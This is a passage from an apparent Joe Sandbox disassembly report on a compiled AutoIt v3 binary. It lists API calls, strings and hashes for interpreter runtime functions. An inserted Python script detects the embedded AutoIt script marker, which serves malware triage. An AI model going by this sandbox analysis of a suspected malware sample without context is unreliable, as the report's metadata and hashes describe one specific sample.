                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                    • String ID: Line %d: $AutoIt -
                                                    • API String ID: 230667853-4094128768
                                                    • Opcode ID: c6376e3c54ef3c8e9bbb443a43ea1fcdb43d0abd309ddb5abb8d340ac2c91cf7
                                                    • Instruction ID: 933a36bf5bcc6edcf19338100530c8a978dde6f06c58b4074833296954e0a1bc
                                                    • Opcode Fuzzy Hash: c6376e3c54ef3c8e9bbb443a43ea1fcdb43d0abd309ddb5abb8d340ac2c91cf7
                                                    • Instruction Fuzzy Hash: 91419171508309AAD321EB60DC85BDF77DCAF84360F004A1AF585921E1EF78E648FB96

                                                    Control-flow Graph

                                                    control_flow_graph 1060 f050db-f0514b CreateWindowExW * 2 ShowWindow * 2
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F05109
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F0512A
                                                    • ShowWindow.USER32(00000000), ref: 00F0513E
                                                    • ShowWindow.USER32(00000000), ref: 00F05147
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: ce4f4f96052805523f3eaabfc89233cd19e804a08c7a07133d53109ec09a657f
                                                    • Instruction ID: 3cb1eab77878b76e1aa7bd98c9a86ab96f92f5e5c78bfd118a3bd7bac561163b
                                                    • Opcode Fuzzy Hash: ce4f4f96052805523f3eaabfc89233cd19e804a08c7a07133d53109ec09a657f
                                                    • Instruction Fuzzy Hash: 07F0DA715453987EEB712727AC88E773E7DD7C7F50F00021AB900A22B1CA651851EEB0

                                                    Control-flow Graph

                                                    control_flow_graph 1061 f59b16-f59b9b call f04a8c call f59cf1 1066 f59ba5-f59c5c call f04ab2 * 4 call f04a8c call f1593c * 2 call f04ab2 call f596c4 call f58f0e 1061->1066 1067 f59b9d 1061->1067 1090 f59c73-f59c77 1066->1090 1091 f59c5e-f59c6e call f12f85 * 2 1066->1091 1068 f59b9f-f59ba0 1067->1068 1070 f59ce8-f59cee 1068->1070 1092 f59c79-f59cd1 call f590c1 call f12f85 1090->1092 1093 f59cd8-f59cde call f12f85 1090->1093 1091->1068 1104 f59cd6 1092->1104 1103 f59ce0-f59ce6 1093->1103 1103->1070 1104->1103
                                                    APIs
                                                      • Part of subcall function 00F04A8C: _fseek.LIBCMT ref: 00F04AA4
                                                      • Part of subcall function 00F59CF1: _wcscmp.LIBCMT ref: 00F59DE1
                                                      • Part of subcall function 00F59CF1: _wcscmp.LIBCMT ref: 00F59DF4
                                                    • _free.LIBCMT ref: 00F59C5F
                                                    • _free.LIBCMT ref: 00F59C66
                                                    • _free.LIBCMT ref: 00F59CD1
                                                      • Part of subcall function 00F12F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00F19C54,00000000,00F18D5D,00F159C3), ref: 00F12F99
                                                      • Part of subcall function 00F12F85: GetLastError.KERNEL32(00000000,?,00F19C54,00000000,00F18D5D,00F159C3), ref: 00F12FAB
                                                    • _free.LIBCMT ref: 00F59CD9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                    • API String ID: 1552873950-2806939583
                                                    • Opcode ID: debd864d0832de9cd9e76fbd25f8ca32b63088750f9d48d753cdc5132f29438d
                                                    • Instruction ID: 9f6a2fc532cc9e4435fba6c37d7d541030a81ea30dd9b143858609dd00e49e39
                                                    • Opcode Fuzzy Hash: debd864d0832de9cd9e76fbd25f8ca32b63088750f9d48d753cdc5132f29438d
                                                    • Instruction Fuzzy Hash: 41514CB1E04219EFDF24DF64DC45AAEBBB9FF48304F00049EB649A3281DB755A849F58
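The function above (f59b16, `_fseek` plus two `_wcscmp` calls and the string `>>>AUTOIT SCRIPT<<<`) is the AutoIt v3 interpreter stub locating the compiled script embedded in its own image; together with the `AutoIt v3` window class and the `Software\AutoIt v3\AutoIt` registry path seen in the earlier functions, it marks this sample as a compiled AutoIt binary. The following Python is an added triage check, not part of the Joe Sandbox report or of AutoIt: it scans a file for those three strings in both ASCII and UTF-16LE (compiled AutoIt stores the script marker as wide characters, which is why the stub compares it with `_wcscmp`) and treats only the script marker as decisive, since the interpreter strings alone also appear in a clean `AutoIt3.exe`. The sample buffers are constructed inline; the offsets in them are arbitrary.

```python
"""Triage: does a PE carry an embedded compiled AutoIt v3 script?

Added example, not code from the report or from AutoIt. Indicator strings are
the ones visible in the function listings above; the placement of the
constructed sample buffers is arbitrary.
"""
from __future__ import annotations

import sys

# Decisive indicator: the header string of the embedded compiled script.
AUTOIT_SCRIPT_MARKER = ">>>AUTOIT SCRIPT<<<"
# Corroborating indicators: present in any AutoIt v3 interpreter image,
# including the legitimate AutoIt3.exe, so they are not a verdict on their own.
AUTOIT_INTERPRETER_STRINGS = ("AutoIt v3", r"Software\AutoIt v3\AutoIt")


def _find_all(haystack: bytes, needle: bytes) -> list[int]:
    """Return every (possibly overlapping) offset of needle in haystack."""
    hits: list[int] = []
    pos = haystack.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = haystack.find(needle, pos + 1)
    return hits


def find_indicators(data: bytes) -> dict[str, list[int]]:
    """Map each indicator string to the sorted offsets where it occurs,
    in either ASCII or UTF-16LE encoding. Strings that never occur are omitted."""
    results: dict[str, list[int]] = {}
    for text in (AUTOIT_SCRIPT_MARKER, *AUTOIT_INTERPRETER_STRINGS):
        offsets = _find_all(data, text.encode("ascii"))
        offsets += _find_all(data, text.encode("utf-16-le"))
        if offsets:
            results[text] = sorted(offsets)
    return results


def script_marker_offsets(data: bytes) -> list[int]:
    """Offsets of the compiled-script marker; empty if none."""
    return find_indicators(data).get(AUTOIT_SCRIPT_MARKER, [])


def is_compiled_autoit(data: bytes) -> bool:
    """True only when the script marker is present; interpreter strings alone
    mean an AutoIt runtime, not necessarily a compiled script."""
    return bool(script_marker_offsets(data))


def scan_file(path: str) -> dict[str, list[int]]:
    """Read a file and return its indicator offsets (convenience wrapper)."""
    with open(path, "rb") as fh:
        return find_indicators(fh.read())


def build_compiled_sample() -> bytes:
    """Constructed stand-in for a compiled AutoIt PE: interpreter strings in
    the image, UTF-16LE script marker at a fixed offset. Not the real sample."""
    buf = bytearray(512)
    buf[0:2] = b"MZ"
    buf[64:73] = b"AutoIt v3"                                   # 9 bytes ASCII
    buf[128:178] = r"Software\AutoIt v3\AutoIt".encode("utf-16-le")  # 25 chars
    buf[256:294] = AUTOIT_SCRIPT_MARKER.encode("utf-16-le")      # 19 chars
    return bytes(buf)


def build_runtime_only_sample() -> bytes:
    """Constructed stand-in for a bare interpreter image: no script marker."""
    buf = bytearray(512)
    buf[0:2] = b"MZ"
    buf[64:73] = b"AutoIt v3"
    return bytes(buf)


if __name__ == "__main__":
    targets = [(p, scan_file(p)) for p in sys.argv[1:]] or [
        ("<constructed compiled sample>", find_indicators(build_compiled_sample())),
        ("<constructed runtime-only sample>", find_indicators(build_runtime_only_sample())),
    ]
    for name, hits in targets:
        verdict = "compiled AutoIt script" if AUTOIT_SCRIPT_MARKER in hits else "no script marker"
        print(f"{name}: {verdict}")
        for text, offsets in hits.items():
            print(f"  {text!r} at {', '.join(hex(o) for o in offsets)}")
```

Run it with one or more file paths to scan real binaries, or with no arguments to see the two constructed buffers classified. The UTF-16LE search for `AutoIt v3` also matches inside the wide registry string, which is expected; the offsets are reported so an analyst can carve the script blob that starts at the marker.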

                                                    Control-flow Graph

                                                    control_flow_graph 1105 f1563d-f15656 1106 f15673 1105->1106 1107 f15658-f1565d 1105->1107 1108 f15675-f1567b 1106->1108 1107->1106 1109 f1565f-f15661 1107->1109 1110 f15663-f15668 call f18d58 1109->1110 1111 f1567c-f15681 1109->1111 1123 f1566e call f18fe6 1110->1123 1112 f15683-f1568d 1111->1112 1113 f1568f-f15693 1111->1113 1112->1113 1115 f156b3-f156c2 1112->1115 1116 f156a3-f156a5 1113->1116 1117 f15695-f156a0 call f13010 1113->1117 1121 f156c4-f156c7 1115->1121 1122 f156c9 1115->1122 1116->1110 1120 f156a7-f156b1 1116->1120 1117->1116 1120->1110 1120->1115 1126 f156ce-f156d3 1121->1126 1122->1126 1123->1106 1127 f156d9-f156e0 1126->1127 1128 f157bc-f157bf 1126->1128 1129 f15721-f15723 1127->1129 1130 f156e2-f156ea 1127->1130 1128->1108 1132 f15725-f15727 1129->1132 1133 f1578d-f1578e call f20dd7 1129->1133 1130->1129 1131 f156ec 1130->1131 1134 f156f2-f156f4 1131->1134 1135 f157ea 1131->1135 1136 f15729-f15731 1132->1136 1137 f1574b-f15756 1132->1137 1144 f15793-f15797 1133->1144 1139 f156f6-f156f8 1134->1139 1140 f156fb-f15700 1134->1140 1141 f157ee-f157f7 1135->1141 1142 f15741-f15745 1136->1142 1143 f15733-f1573f 1136->1143 1145 f15758 1137->1145 1146 f1575a-f1575d 1137->1146 1139->1140 1147 f157c4-f157c8 1140->1147 1149 f15706-f1571f call f20ef8 1140->1149 1141->1108 1150 f15747-f15749 1142->1150 1143->1150 1144->1141 1151 f15799-f1579e 1144->1151 1145->1146 1146->1147 1148 f1575f-f1576b call f14906 call f2108b 1146->1148 1152 f157da-f157e5 call f18d58 1147->1152 1153 f157ca-f157d7 call f13010 1147->1153 1166 f15770-f15775 1148->1166 1165 f15782-f1578b 1149->1165 1150->1146 1151->1147 1156 f157a0-f157b1 1151->1156 1152->1123 1153->1152 1161 f157b4-f157b6 1156->1161 1161->1127 1161->1128 1165->1161 1167 f1577b-f1577e 1166->1167 1168 f157fc-f15800 1166->1168 1167->1135 1169 f15780 1167->1169 1168->1141 1169->1165
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                    • String ID:
                                                    • API String ID: 1559183368-0
                                                    • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                    • Instruction ID: b2cbe457308f6b00fa9115ba835eae9671d101e1260bf33628769bc1d0d10794
                                                    • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                    • Instruction Fuzzy Hash: 4351C531E00B09DBDB249F69D8816EE77A5AF80B30F248729F835962D0D7749DD0BB80

                                                    Control-flow Graph

                                                    control_flow_graph 1170 ef52b0-ef52c0 1171 ef52c6-ef52cd 1170->1171 1172 f2df28-f2df2f 1170->1172 1173 f2df3a-f2df41 1171->1173 1174 ef52d3-ef52ea PeekMessageW 1171->1174 1175 ef530c 1172->1175 1176 f2df35 1172->1176 1173->1175 1177 f2df47 1173->1177 1179 ef52ec-ef52f4 1174->1179 1180 ef5313-ef5317 1174->1180 1178 ef530e-ef5312 1175->1178 1176->1173 1187 f2df4c-f2df52 1177->1187 1183 ef52fa-ef5306 1179->1183 1184 f2dfab-f2dfbc 1179->1184 1181 ef531d-ef5326 1180->1181 1182 f2df95-f2df9c 1180->1182 1181->1187 1188 ef532c-ef533c call ef359e 1181->1188 1182->1184 1185 ef5368-ef536d 1183->1185 1186 ef5308-ef530a 1183->1186 1185->1178 1186->1175 1189 ef536f-ef5374 1186->1189 1190 f2df86 1187->1190 1191 f2df54-f2df60 1187->1191 1196 ef533e-ef534e PeekMessageW 1188->1196 1197 ef5352-ef5366 TranslateMessage DispatchMessageW 1188->1197 1189->1178 1190->1182 1191->1190 1193 f2df62-f2df66 1191->1193 1193->1190 1195 f2df68-f2df7b TranslateAcceleratorW 1193->1195 1195->1196 1198 f2df81 1195->1198 1196->1179 1199 ef5350 1196->1199 1197->1196 1198->1188 1199->1180
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF52E6
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF534A
                                                    • TranslateMessage.USER32(?), ref: 00EF5356
                                                    • DispatchMessageW.USER32(?), ref: 00EF5360
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Message$Peek$DispatchTranslate
                                                    • String ID:
                                                    • API String ID: 1795658109-0
                                                    • Opcode ID: 0109c6da648520733265fffba680f6b13140a86951e39307336f999a370f3003
                                                    • Instruction ID: 0fcdb3bbbf7b665136250208741811a17b6294f01d4765b4667f5f76b1d9e17f
                                                    • Opcode Fuzzy Hash: 0109c6da648520733265fffba680f6b13140a86951e39307336f999a370f3003
                                                    • Instruction Fuzzy Hash: 2531683290870E9BEB309B68DC84FF977F89B61308F201259E312A71E0D7B59884FB11
                                                    APIs
                                                      • Part of subcall function 00F107BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F107EC
                                                      • Part of subcall function 00F107BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F107F4
                                                      • Part of subcall function 00F107BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F107FF
                                                      • Part of subcall function 00F107BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F1080A
                                                      • Part of subcall function 00F107BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F10812
                                                      • Part of subcall function 00F107BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1081A
                                                      • Part of subcall function 00F0FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00EFAC6B), ref: 00F0FFA7
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EFAD08
                                                    • OleInitialize.OLE32(00000000), ref: 00EFAD85
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F32F56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID: h
                                                    • API String ID: 1986988660-3415971826
                                                    • Opcode ID: 0720e7b7a83f95712fb8a06d343afdcfb7b2fc21f093e127345f8d1e739a5dbb
                                                    • Instruction ID: dd29163c76d3cf323ffdc5b428ce0646ec103e2bc3114985e5eec7d8427a1137
                                                    • Opcode Fuzzy Hash: 0720e7b7a83f95712fb8a06d343afdcfb7b2fc21f093e127345f8d1e739a5dbb
                                                    • Instruction Fuzzy Hash: 4B8199B0909348CEC394FF2AADC56967FE5FBC8306724866AD419D72B2EB345404BF51
                                                    APIs
                                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00EF1275,SwapMouseButtons,00000004,?), ref: 00EF12A8
                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00EF1275,SwapMouseButtons,00000004,?), ref: 00EF12C9
                                                    • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00EF1275,SwapMouseButtons,00000004,?), ref: 00EF12EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: 70c780ed93e27db26bd5ae89cf6cafcac040d17b92bc98ccb8951f952003ccf3
                                                    • Instruction ID: 48e99972305fd5819fa811cd3b01793cfaf10a9f687c63ae98aa5c2ac1df3e41
                                                    • Opcode Fuzzy Hash: 70c780ed93e27db26bd5ae89cf6cafcac040d17b92bc98ccb8951f952003ccf3
                                                    • Instruction Fuzzy Hash: 5B11487161520CFFEB208FA4DC84AFEBBA8EF45744F105599E905E7120D6319E44A7A0
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,00F82C4C), ref: 00F53F57
                                                    • GetLastError.KERNEL32 ref: 00F53F66
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F53F75
                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F82C4C), ref: 00F53FD2
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 2267087916-0
                                                    • Opcode ID: 74b2cb8dc0556bc7b5094921caea4e9dd9684181ec98deead8efcf966db29822
                                                    • Instruction ID: c09a346e538cf9e76484a5fbbca5569a704b4258a0901074fb752608d6cb271e
                                                    • Opcode Fuzzy Hash: 74b2cb8dc0556bc7b5094921caea4e9dd9684181ec98deead8efcf966db29822
                                                    • Instruction Fuzzy Hash: 362171709082019FC714DF2CC8858AEB7F4BE553A5F104A1DF9A5C72A1DB31DA4AEB92
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F05B58
                                                      • Part of subcall function 00F056F8: _memset.LIBCMT ref: 00F05787
                                                      • Part of subcall function 00F056F8: _wcscpy.LIBCMT ref: 00F057DB
                                                      • Part of subcall function 00F056F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F057EB
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00F05BAD
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F05BBC
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F40D7C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                    • String ID:
                                                    • API String ID: 1378193009-0
                                                    • Opcode ID: 0da01608caeb18998486f7ac49513d352d15bfbd02a4808fb4904112388ed270
                                                    • Instruction ID: 99ddafd9b270f04a3f03b46507b1fa4bd5caf67b8e2a784368416526aa541a4d
                                                    • Opcode Fuzzy Hash: 0da01608caeb18998486f7ac49513d352d15bfbd02a4808fb4904112388ed270
                                                    • Instruction Fuzzy Hash: BC21F8B1D047889FE7728B648895BEBFFEC9F41714F00048DEA9A56281CB742988FF41
                                                    APIs
                                                      • Part of subcall function 00F049C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00F027AF,?,00000001), ref: 00F049F4
                                                    • _free.LIBCMT ref: 00F3FB04
                                                    • _free.LIBCMT ref: 00F3FB4B
                                                      • Part of subcall function 00F029BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F02ADF
                                                    Strings
                                                    • Bad directive syntax error, xrefs: 00F3FB33
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                    • String ID: Bad directive syntax error
                                                    • API String ID: 2861923089-2118420937
                                                    • Opcode ID: 664101b33015016485e10adc2c451a1a2b19257633cea8af7d5913851d4e201c
                                                    • Instruction ID: 4340ff61d013c1e4675b50904de5d10cd2c5fe7fc34d4eca6f2243918bd61026
                                                    • Opcode Fuzzy Hash: 664101b33015016485e10adc2c451a1a2b19257633cea8af7d5913851d4e201c
                                                    • Instruction Fuzzy Hash: 98916E71D10219EFCF04EFA4CC919EEB7B4BF05320F14456AF915AB291DB38A949EB50
                                                    APIs
                                                      • Part of subcall function 00F04AB2: __fread_nolock.LIBCMT ref: 00F04AD0
                                                    • _wcscmp.LIBCMT ref: 00F59DE1
                                                    • _wcscmp.LIBCMT ref: 00F59DF4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$__fread_nolock
                                                    • String ID: FILE
                                                    • API String ID: 4029003684-3121273764
                                                    • Opcode ID: a3dd2ecbd2914a2cb7c89c73a268f920a44869ced1a92b62068c2adcb23dfc3c
                                                    • Instruction ID: c8c7911a61ca239f710c2b5ba52e9f725295819eb0ece36a088ca4420f051ae0
                                                    • Opcode Fuzzy Hash: a3dd2ecbd2914a2cb7c89c73a268f920a44869ced1a92b62068c2adcb23dfc3c
                                                    • Instruction Fuzzy Hash: 3E41E971A44209FADF20DEA4CC46FDF77BDDF45710F000469FA00A7181D675A948A7A5
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F4032B
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00F40375
                                                      • Part of subcall function 00F10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F02A58,?,00008000), ref: 00F102A4
                                                      • Part of subcall function 00F109C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F109E4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                    • String ID: X
                                                    • API String ID: 3777226403-3081909835
                                                    • Opcode ID: f72010664a7d54f574d98837c2a8dc4a19fc333ccfabe97b8c3ede22d665bf9d
                                                    • Instruction ID: 7d45562c7c30a41abfb8fc203c1818695a0cea6fd3155b31471aa288adbf8611
